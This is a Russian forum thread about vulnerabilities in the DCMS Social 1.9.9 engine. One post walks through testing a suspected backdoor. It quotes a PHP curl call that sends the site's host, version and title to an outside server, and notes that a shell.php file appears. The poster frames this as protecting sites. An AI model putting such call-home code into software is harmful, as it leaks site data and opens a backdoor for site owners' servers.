Добро пожаловать, Гость!
Напишите все баги и уязвимости dcms social 1.9.9 - Страница 3
Баги/обновления движка | Напишите все баги и уязвимости dcms social 1.9.9
biket
: Напишите все баги и уязвимости dcms social 1.9.9
22 Окт 2019Если кому-то еще нужна доработанная и закрытая от уязвимостей версия 1.9.9 с поддержкой php 7, то прошу помочь со списком, что нужно исправить.
Оригинальная версия 1.9.9 залита на GitHub Ссылка
Последний раз редактировалось biket
2 Ноября 2019
Комментарии:
waphack 4 Ноября 2019Вот такая информация есть
Данный обзор, во избежания проблем предоставлен кратко и урезанно
В данном обзоре, скрыты и заменены некие детали, по указанной ниже причине.
Вопросы где же оно, как взломать другой сайт, будут игнорироваться.
Данный обзор создан, для наглядности уязвимости, чем уберечь ваш сайт а не взломать другой!
Распаковуем архив в корень, появляется папка curl
1) Открываем в файловом менеджере файл /curl/index.php
Находим
curl_setopt($ch, CURLOPT_URL, 'http://адрес сайта/curl.php?site=' . $_SERVER['HTTP_HOST'] . '&version=' . $set['dcms_version'] . '&title=' . $set['title']);
И заменяем надпись - адрес сайта на свой
2) Открываем в браузере файл include.php
Вот так адрес вашего сайта/curl/include.php
3) Возвращаемся в папку curl
И если видим появление файла shell.php то расширение curl
На вашем хостинге установлено, всё работает.
4) Удаляем файл shell.php
/*----------Проверяем работу через 80 порт-----------*/
5) Файл curl.php переносим на любой иной сайт, чем имитируем
Подключение к сайту dcms-social.ru
6) в запросе
curl_setopt($ch, CURLOPT_URL, 'http://уже указанный адрес сайта/curl.php?site=' . $_SERVER['HTTP_HOST'] . '&version=' . $set['dcms_version'] . '&title=' . $set['title']);
Снова меняем но уже указанный адрес сайта на новый, а так же путь куда переместили файл curl.php
Например, если поместили в корень сайта wapfa.su
То делаем так
curl_setopt($ch, CURLOPT_URL, 'http://wapfa.su/curl.php?site=' . $_SERVER['HTTP_HOST'] . '&version=' . $set['dcms_version'] . '&title=' . $set['title']);
Если поместили файл curl.php в папку /curl/
То указываем и её
curl_setopt($ch, CURLOPT_URL, 'http://wapfa.su/curl/curl.php?site=' . $_SERVER['HTTP_HOST'] . '&ve
ZAN0ZA 4 Ноября 2019Я небуду лезть глубоко в палемику. Дабы не окрестили параноиком. Но скажу что куда бы не вел курл это фитиль пороховой бочки об который все местные невольно тушат окурки кретикуя это ядро.
kantry 4 Ноября 2019DoR, я убрал отнюдь не потому что твоих домыслов наслушался, а потому что ссылка вела на 404 ошибку, ну и нахер само собой она не надо.хз.
kantry 4 Ноября 2019ZAN0ZA, при чем тут, чёрная, белая? Там вон ниже уже один из параноиков подошел:-) Там просто $data не нужен. А сам "бекдор" ведёт на офф сайт, с какой целью, Бикет пусть озвучит:-)
Энмеркар 4 Ноября 2019DoR, Привет я итак его подрезал пока,, у меня просто на него свои планы,, сейчас просто немного кодом занят
______________________
꧁༺Энмеркар༻꧂
DoR 4 Ноября 2019Энмеркар, Привет. CURL не более чем находиться в области видимости крона...
( удаляй, на работу крона не влияет )
// --- Девочка ZANOZA права.
- Уже была тема, откричались картонные головы.
- Уже случился мини гайд!
После чего, приуныли, да рассосались на побыстрее...
// --- Смотришь, а по гитхабам
- > /sys/inc/fnc.php -> curl() <-> ( было и нет )
// --- Получается...
- Левой рукой я сам параною, а правой обвиняю в этом других.
*И дело не в curl, а как он написан.
- EXEC тоже жутко полезна, но смотря в каких руках!
Удаляй и не думай...))
